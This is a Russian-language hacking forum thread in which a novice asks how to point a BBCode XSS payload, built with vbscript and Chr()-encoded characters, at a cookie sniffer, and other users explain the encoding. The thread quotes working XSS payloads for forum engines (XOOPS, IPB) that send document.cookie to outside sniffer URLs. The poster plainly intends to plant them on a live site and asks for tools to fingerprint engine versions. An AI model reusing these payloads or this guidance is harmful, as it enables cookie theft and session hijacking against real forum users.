Помогите перваку, как в такой XSS HTML: [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color] указать путь к античатовскому снифферу. Вопрос лажовый, думаю вам ответить на него пару пустяков...
там vbscript, а Chr( ) это встроенная функция, возвращающая символ, имеющий заданный код ASCII коды ASCII - http://electronics.sortos.ru/docs/ascii_table.html составляешь цепочку из Chr() где и будет твой код сниффера и не забудь пробел убрать ("repl ace" -> "replace") незабудь про ±
VectorG я то тебе + могу поставить, мне ни жалко...Только я ничерта не понял, как должна быть выгледеть это цепочка, чтоб в ней был код сниффера... Попробую спросить вас по другому, что мне надо добавить в этот XSS, чтоб после его, размешенния куки пользователей приходили на сниффер. Вот например после размешенния вот такой XSS HTML: [em*ail]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://site/snif.jpg?"+document.cookie);` на IPB мне сливаються куки. Вот как в той XSS реализовать это, если это вообще возможно?
VectorG я понял так твой пост... Если URL к снифферу будет выглядить например вот так "http://site/snif.php" то мне надо в скобки Chr вставлять каждый символ URL'а , тоесть например http должно выглядить так, к примеру по коду Decimal из таблицы ASCII Code: Chr(104)+Chr(116)+Chr(116)+Chr(112) Я правильно понял? Если нет, то ни мог бы ты поконкретний объяснить?
Vovec, а в чем вопрос? тебе дали таблицу аски. Ты хочешь, чтобы тебе перевели http://site/snif.php к виду chr()? Ну тогда предоставь полный адрес снифера. И то не знаю есть ли здесь альтруисты...
podkashey да не, я всё что к чему уже понял, сначало просто не догнал.Только есть ещё вапросы, на которые я надеюсь вы дадите ответы. Если я укажу URL каторый я указал ниже, в кодах ACSII к примеру,то он будет работать или я его не правильно сформировал? И ещё вопрос, в коды ACSII надо загонять только URL, или также всё что идёт после s.jpg Code: http://antichat.ru/cgi-bin/s.jpg?+document.cookie Больше негде спросить, кроме как у вас...
Конеш спасибо что не поленилься мне Url перевести в Ascii код, держи за это + , но проверить мне негде, на том сайте на катором я хотел это разместить это палевно(нельзя потом удалить), а на лакалхосте немогу так как не могу найти Xoops этой версии, больная старая она наверно=) Да и вообще я сомневаюсь что на том сайте где я хотел разместить этот Xss та версия. Лучше подскажите мне прогу которой лучше всего определять версию движков?
